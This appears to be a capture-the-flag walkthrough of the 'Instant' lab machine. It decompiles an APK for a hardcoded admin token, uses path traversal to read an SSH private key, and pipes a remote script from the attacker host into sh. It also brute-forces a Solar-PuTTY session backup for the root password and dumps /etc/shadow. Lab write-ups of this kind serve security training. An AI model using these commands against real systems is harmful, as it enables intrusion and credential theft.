Instant
Recon
HTTP
APK
Decompile APK with https://www.decompiler.com/jar/3b652ecd27c6422cb944b974af1945a1/instant.apk
new OkHttpClient().newCall(new Request.Builder().url("http://mywalletv1.instant.htb/api/v1/view/profile").addHeader("Authorization", "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MSwicm9sZSI6IkFkbWluIiwid2FsSWQiOiJmMGVjYTZlNS03ODNhLTQ3MWQtOWQ4Zi0wMTYyY2JjOTAwZGIiLCJleHAiOjMzMjU5MzAzNjU2fQ.v0qyyAqDSgyoNFHU7MgRQcDA0Bw99_8AEXKGtWZ6rYA").build()).enqueue(new Callback() {Update hosts:
└─$ grep inst /etc/hosts
10.129.89.112 instant.htb mywalletv1.instant.htb└─$ curl 'http://mywalletv1.instant.htb/api/v1/view/profile' -H 'Authorization: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MSwicm9sZSI6IkFkbWluIiwid2FsSWQiOiJmMGVjYTZlNS03ODNhLTQ3MWQtOWQ4Zi0wMTYyY2JjOTAwZGIiLCJleHAiOjMzMjU5MzAzNjU2fQ.v0qyyAqDSgyoNFHU7MgRQcDA0Bw99_8AEXKGtWZ6rYA'
{"Profile":{"account_status":"active","email":"admin@instant.htb","invite_token":"instant_admin_inv","role":"Admin","username":"instantAdmin","wallet_balance":"10000000","wallet_id":"f0eca6e5-783a-471d-9d8f-0162cbc900db"},"Status":200}API actions:
└─$ grep 'http://.*instant.htb.*")' . -Raino
./instant/TransactionActivity.java:58:http://mywalletv1.instant.htb/api/v1/initiate/transaction").addHeader("Authorization", str4).post(RequestBody.create(MediaType.parse("application/json")
./instant/TransactionActivity.java:80:http://mywalletv1.instant.htb/api/v1/confirm/pin").header("Authorization", str4).post(RequestBody.create(MediaType.parse("application/json")
./instant/ProfileActivity.java:37:http://mywalletv1.instant.htb/api/v1/view/profile")
./instant/LoginActivity.java:64:http://mywalletv1.instant.htb/api/v1/login").post(RequestBody.create(MediaType.parse("application/json")
./instant/AdminActivities.java:14:http://mywalletv1.instant.htb/api/v1/view/profile").addHeader("Authorization", "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MSwicm9sZSI6IkFkbWluIiwid2FsSWQiOiJmMGVjYTZlNS03ODNhLTQ3MWQtOWQ4Zi0wMTYyY2JjOTAwZGIiLCJleHAiOjMzMjU5MzAzNjU2fQ.v0qyyAqDSgyoNFHU7MgRQcDA0Bw99_8AEXKGtWZ6rYA")
./instant/RegisterActivity.java:61:http://mywalletv1.instant.htb/api/v1/register").post(RequestBody.create(MediaType.parse("application/json")More subdomains:
└─$ curl -X GET "http://swagger-ui.instant.htb/api/v1/admin/list/users" -H "accept: application/json" -H "Authorization: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MSwicm9sZSI6IkFkbWluIiwid2FsSWQiOiJmMGVjYTZlNS03ODNhLTQ3MWQtOWQ4Zi0wMTYyY2JjOTAwZGIiLCJleHAiOjMzMjU5MzAzNjU2fQ.v0qyyAqDSgyoNFHU7MgRQcDA0Bw99_8AEXKGtWZ6rYA" -s | jq
{
"Status": 200,
"Users": [
{
"email": "admin@instant.htb",
"role": "Admin",
"secret_pin": 87348,
"status": "active",
"username": "instantAdmin",
"wallet_id": "f0eca6e5-783a-471d-9d8f-0162cbc900db"
},
{
"email": "shirohige@instant.htb",
"role": "instantian",
"secret_pin": 42845,
"status": "active",
"username": "shirohige",
"wallet_id": "458715c9-b15e-467b-8a3d-97bc3fcf3c11"
}
]
}Possible LFI:
└─$ curl -X GET "http://swagger-ui.instant.htb/api/v1/admin/read/log?log_file_name=..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fhosts" -H "accept: application/json" -H "Authorization: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MSwicm9sZSI6IkFkbWluIiwid2FsSWQiOiJmMGVjYTZlNS03ODNhLTQ3MWQtOWQ4Zi0wMTYyY2JjOTAwZGIiLCJleHAiOjMzMjU5MzAzNjU2fQ.v0qyyAqDSgyoNFHU7MgRQcDA0Bw99_8AEXKGtWZ6rYA" -s | jq
{
"/home/shirohige/logs/../../../../../../etc/hosts": [
"127.0.0.1 localhost instant.htb mywalletv1.instant.htb swagger-ui.instant.htb\n",
"127.0.1.1 instant\n",
"\n",
"# The following lines are desirable for IPv6 capable hosts\n",
"::1 ip6-localhost ip6-loopback\n",
"fe00::0 ip6-localnet\n",
"ff00::0 ip6-mcastprefix\n",
"ff02::1 ip6-allnodes\n",
"ff02::2 ip6-allrouters\n"
],
"Status": 201
}
└─$ curl -X GET "http://swagger-ui.instant.htb/api/v1/admin/read/log?log_file_name=..%2F..%2F..%2F..%2F..%2F..%2Fhome%2Fshirohige%2F.ssh%2Fid_rsa" -H "accept: application/json" -H "Authorization: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MSwicm9sZSI6IkFkbWluIiwid2FsSWQiOiJmMGVjYTZlNS03ODNhLTQ3MWQtOWQ4Zi0wMTYyY2JjOTAwZGIiLCJleHAiOjMzMjU5MzAzNjU2fQ.v0qyyAqDSgyoNFHU7MgRQcDA0Bw99_8AEXKGtWZ6rYA" -s | jq -r 'to_entries[0].value | join("") | gsub("\\n";"\n")' | tee shirohige.id_rsa
-----BEGIN RSA PRIVATE KEY-----
MIIEoAIBAAKCAQEA2P4Zuaf+b3nJJmCap7o3uvciZ9qXJVWHKiQFZR8Tf1Ax/lzK
t5WXp2ia/NbtjbMh8uMfXBLh83zgqqRWwNg/uBUqB3Ol4wyDRxJMyHVdy4xS/hED
8j7MWQhUguGc7O8a3ly9+i2fsrbCYUOUXlVlGoLuIBZbnohuAWkpqe/aI6TA6s2n
/Cdy6aWr8/6CG5goZ0+cZT1XQ9qHf2MRBRAZ5zccqq9h5jEKiU+nSW8Mx4N6dccQ
ydhLe6dGXR0qf+TFn54i/NSyOhjFQcid1EX21KNOSZQkfit/aj3Qr2KvLzGWElSf
OzqTjFtAPReswI9xBKA8FmvRNU22cKXIZ1pprwIDAQABAoH/OHN8PdB2lCNN/hRW
9H7kAL/kAFPdyz8OhIGnTA3JnlVx31REm+SCKT5z4IZwE20gZ9yufxJqgrqTuDdv
JyK0pC9Dv9+8rrssOLeKDwLf/Xq3T8fqPugXdKu2HYnHfKkeISGZF6/6Dx3jDWq6
lQM749z44vm63B0IgVV0GvTkyy1jU+0pTe6ZgBu41+VT+CkHxGHmWfY/VOmQGiBO
venfBIdyWceRMul0pGR4GVjBP7uRORigWhM58z9GdepQj3zr51AePCCsrOwfOdPa
Zqnxb7VFHft0gRGb0efv1rKN+yBl3adeALMgkqpJgtwq9eUSdGlulpW+kM4ve+AU
g9rpAoGBAPs/97JAyCd3/N3mw9zfqxEIYlAx5ek6mcU7/74OeIa5eKyh0m89HGi2
6deSpb6g8V+aPzYGMZ6/OvU26WV/SpAZ0PNwYvypGlS3HQSejysRY3rtKI9HxUfp
f7VwtcBcnlZP03Nw2U2ELrUt4YVpr7G4ebS70sye2YUbmbdwbm81AoGBAN0YVHbE
PRGpXWESirUgrg2n6TJRFhbONma5b5Zac2SMTS5h8HuVjqgmAjZgn5WpsY/hb9Uy
u4Pk4pwTBPg38YiVC19prHvlkg2RyIIJcdJL5LO+nzJ6V/H4/54l8WERTV9O/ZWp
1aB3rLJbhc1Qe66UF5a6oPbwl75xQgSzhN3TAoGAUlsTbCCD+zv/bRU5WmsOfdTL
tRHGFP8abGZQXBIOO8sL3Tpl6gSUDVb3q6vsHGJQ/E9pLOI23Zw9TSektZpV7Iop
zcInED613NLw9hSrRSi7/Q1D4ENcTUgijmzVhqpVVGFyJEL3V8teLBFP/RU5e/3G
FxIB9QSUtGbpqhF2gYkCgYAkzXD52A6GSxflGa4HGmp+kW2q136Cy06Y6NMfRu0g
Vo5eYyUhnTKC4NjLbmgCBJ4u4gq4hVpbSRVDf5L7Mmy9HHopJrD0arFWGucyZhoR
NFrcZKWhRGYxPA5op843Jycm70Ic0IljzafshHmQRI5h7/rBN02l7USFCdtAZxV9
ywKBgDdT7Qo6IKkrMIhPgSOUC5eZRGyp4F9Nfb1acuQmExnzHSQYTxfK4OpsB14L
Pq5b0Me7gEkxGC46jCv9r8bfL2PgOD1VuC7LsTmnSMS5+w+7+ONiCKm8q11dnQ6t
1frs0MiEQnk0+XvgbpqnyKc+bprCyoMu7/3oM/kcslcHzE+7
-----END RSA PRIVATE KEY-----SSH
└─$ chmod 600 shirohige.id_rsa
└─$ ssh shirohige@instant.htb -i shirohige.id_rsaUser.txt
shirohige@instant:~$ cat user.txt
70d70cb0ba4cd03fc37aa6d0a814ce27Privilege Escalation
shirohige@instant:~/projects/mywallet$ find . | grep -v env
.
./Instant-Api
./Instant-Api/instance
./Instant-Api/mywallet
./Instant-Api/mywallet/swagger_configs
./Instant-Api/mywallet/swagger_configs/inittrans.yml
./Instant-Api/mywallet/swagger_configs/view_logs.yml
./Instant-Api/mywallet/swagger_configs/profile.yml
./Instant-Api/mywallet/swagger_configs/register.yml
./Instant-Api/mywallet/swagger_configs/login.yml
./Instant-Api/mywallet/swagger_configs/transactions.yml
./Instant-Api/mywallet/swagger_configs/pin.yml
./Instant-Api/mywallet/swagger_configs/add_user.yml
./Instant-Api/mywallet/swagger_configs/read_logs.yml
./Instant-Api/mywallet/swagger_configs/list_users.yml
./Instant-Api/mywallet/app.py
./Instant-Api/mywallet/serve.py
./Instant-Api/mywallet/__pycache__
./Instant-Api/mywallet/__pycache__/models.cpython-312.pyc
./Instant-Api/mywallet/models.py
./Instant-Api/mywallet/requirements.txt
./Instant-Api/mywallet/instance
./Instant-Api/mywallet/instance/instant.dbshirohige@instant:~/projects/mywallet$ cat ./Instant-Api/mywallet/.env
SECRET_KEY=VeryStrongS3cretKeyY0uC4NTGET└─$ scp -i shirohige.id_rsa shirohige@instant.htb:/home/shirohige/projects/mywallet/Instant-Api/mywallet/instance/instant.db .
└─$ sqlite3 instant.db 'SELECT * FROM wallet_users;'
1|instantAdmin|admin@instant.htb|f0eca6e5-783a-471d-9d8f-0162cbc900db|pbkdf2:sha256:600000$I5bFyb0ZzD69pNX8$e9e4ea5c280e0766612295ab9bff32e5fa1de8f6cbb6586fab7ab7bc762bd978|2024-07-23 00:20:52.529887|87348|Admin|active
2|shirohige|shirohige@instant.htb|458715c9-b15e-467b-8a3d-97bc3fcf3c11|pbkdf2:sha256:600000$YnRgjnim$c9541a8c6ad40bc064979bc446025041ffac9af2f762726971d8a28272c550ed|2024-08-08 20:57:47.909667|42845|instantian|activeHashes doesn't seem crackable...
shirohige@instant:~/projects/mywallet$ curl 10.10.14.41/lp.sh|sh|tee /tmp/lp.log
...
╔══════════╣ Active Ports
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-ports
tcp 0 0 127.0.0.1:8888 0.0.0.0:* LISTEN 1007/python3
tcp 0 0 127.0.0.1:8808 0.0.0.0:* LISTEN 1011/python3
tcp 0 0 127.0.0.54:53 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp6 0 0 :::80 :::* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
...
╔══════════════════════╗
═════════════════════════════╣ Software Information ╠═════════════════════════════
╚══════════════════════╝
╔══════════╣ Useful software
/usr/bin/base64
/usr/bin/curl
/usr/bin/g++
/usr/bin/gcc
/usr/sbin/lxc
/usr/bin/make
/usr/bin/perl
/usr/bin/ping
/usr/bin/python3
/usr/bin/sudo
/usr/bin/wget
...
══╣ PHP exec extensions
drwxr-xr-x 2 root root 4096 Oct 4 15:22 /etc/apache2/sites-enabled
drwxr-xr-x 2 root root 4096 Oct 4 15:22 /etc/apache2/sites-enabled
lrwxrwxrwx 1 root root 34 Aug 8 20:45 /etc/apache2/sites-enabled/swagger-ui.conf -> ../sites-available/swagger-ui.conf
<VirtualHost *:80>
ServerName swagger-ui.instant.htb
ProxyPreserveHost On
ProxyPass / http://localhost:8808/
ProxyPassReverse / http://localhost:8808/
</VirtualHost>
lrwxrwxrwx 1 root root 35 Aug 8 20:44 /etc/apache2/sites-enabled/instant-app.conf -> ../sites-available/instant-app.conf
<VirtualHost *:80>
ServerName mywalletv1.instant.htb
ProxyPreserveHost On
ProxyPass / http://localhost:8888/
ProxyPassReverse / http://localhost:8888/
</VirtualHost>
...
╔══════════╣ Analyzing Ldap Files (limit 70)
The password hash is from the {SSHA} to 'structural'
drwxr-xr-x 2 root root 4096 Oct 4 15:22 /etc/ldap
...
╔══════════╣ Interesting writable files owned by me or writable by everyone (not in Home) (max 500)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-files
/dev/mqueue
/dev/shm
/home/shirohige
/opt/backups
/opt/backups/Solar-PuTTY
/opt/backups/Solar-PuTTY/sessions-backup.dat
...
╔══════════╣ Modified interesting files in the last 5mins (limit 100)
/home/shirohige/.gnupg/trustdb.gpg
/home/shirohige/.gnupg/pubring.kbx
/tmp/lp.log
...└─$ scp -i shirohige.id_rsa shirohige@instant.htb:/opt/backups/Solar-PuTTY/sessions-backup.dat .SolarPuttyDecrypt - Blog PostSolarPuttyDecrypt - GitHub
Reverse Engineering Solar-PuTTY 4.0.0.47
$rockyouPath = "C:\Program Files\Hashcat\rockyou.txt"
$logFilePath = ".\SolarPuttyDecrypt\output.log"
$sessionsBackupPath = ".\SolarPuttyDecrypt\sessions-backup.dat"
$i=0
Get-Content $rockyouPath | ForEach-Object {
$password = $_
& .\SolarPuttyDecrypt.exe $sessionsBackupPath $password > $logFilePath
if (Select-String "Decrypted file is saved" $logFilePath) {
echo "Password: $password ($i)`n" >> $logFilePath
break
}
$i+=1
}-----------------------------------------------------
SolarPutty Sessions Decrypter by VoidSec
-----------------------------------------------------
{
"Sessions": [
{
"Id": "066894ee-635c-4578-86d0-d36d4838115b",
"Ip": "10.10.11.37",
"Port": 22,
"ConnectionType": 1,
"SessionName": "Instant",
"Authentication": 0,
"CredentialsID": "452ed919-530e-419b-b721-da76cbe8ed04",
"AuthenticateScript": "00000000-0000-0000-0000-000000000000",
"LastTimeOpen": "0001-01-01T00:00:00",
"OpenCounter": 1,
"SerialLine": null,
"Speed": 0,
"Color": "#FF176998",
"TelnetConnectionWaitSeconds": 1,
"LoggingEnabled": false,
"RemoteDirectory": ""
}
],
"Credentials": [
{
"Id": "452ed919-530e-419b-b721-da76cbe8ed04",
"CredentialsName": "instant-root",
"Username": "root",
"Password": "12**24nzC!r0c%q12",
"PrivateKeyPath": "",
"Passphrase": "",
"PrivateKeyContent": null
}
],
"AuthScript": [],
"Groups": [],
"Tunnels": [],
"LogsFolderDestination": "C:\\ProgramData\\SolarWinds\\Logs\\Solar-PuTTY\\SessionLogs"
}
-----------------------------------------------------
[+] DONE Decrypted file is saved in: C:\Users\\OneDrive\Desktop\SolarPutty_sessions_decrypted.txt
Password: estrella (103)Creds:
root:12**24nzC!r0c%q12
Root.txt
shirohige@instant:~/projects/mywallet/Instant-Api/mywallet$ su -
Password:
root@instant:~# cat root.txt
fb167956c9c63608930d4c8aaae2d12cHashes
root@instant:/home/shirohige# cat /etc/shadow | grep '$y'
root:$y$j9T$kbk3gZheVl2NWS6Kg2bYA.$LxNokXrLQvRyfmzXJHiZgzH73o2.Dk6UMGHsyj/Er./:19945:0:99999:7:::
shirohige:$y$j9T$EIEFkB5maGHp2kSFVdu6Q/$7uwKO1Xx2qzjNyqWuNBADn6sCgguYDUX4wfsql9Geq4:19945:0:99999:7:::Past Root
C# -> Python
import base64
from Crypto.Cipher import DES3
from Crypto.Protocol.KDF import PBKDF2
def decrypt(passphrase, ciphertext):
data = ''
try:
# Decode the base64 encoded ciphertext
array = base64.b64decode(ciphertext)
salt = array[:24]
iv = array[24:32]
encrypted_data = array[48:]
# Derive the key using PBKDF2
key = PBKDF2(passphrase, salt, dkLen=24, count=1000)
# Create the Triple DES cipher in CBC mode
cipher = DES3.new(key, DES3.MODE_CBC, iv)
# Decrypt the data
decrypted_data = cipher.decrypt(encrypted_data)
# Remove padding (PKCS7 padding)
padding_len = decrypted_data[-1]
decrypted_data = decrypted_data[:-padding_len]
data = ''.join(chr(c) for c in decrypted_data if chr(c).isascii())
except Exception as e:
print(f'Error: {e}')
return data
with open('./sessions-backup.dat') as f:
cipher = f.read()
with open('rockyou.txt') as passwords:
for i, password in enumerate(passwords):
password = password.strip()
decrypted = decrypt(password, cipher)
print(f'[{i}] {password=}', end='\r')
if 'Credentials' in decrypted:
print('\r', i, password)
print()
print(decrypted)
breakLast updated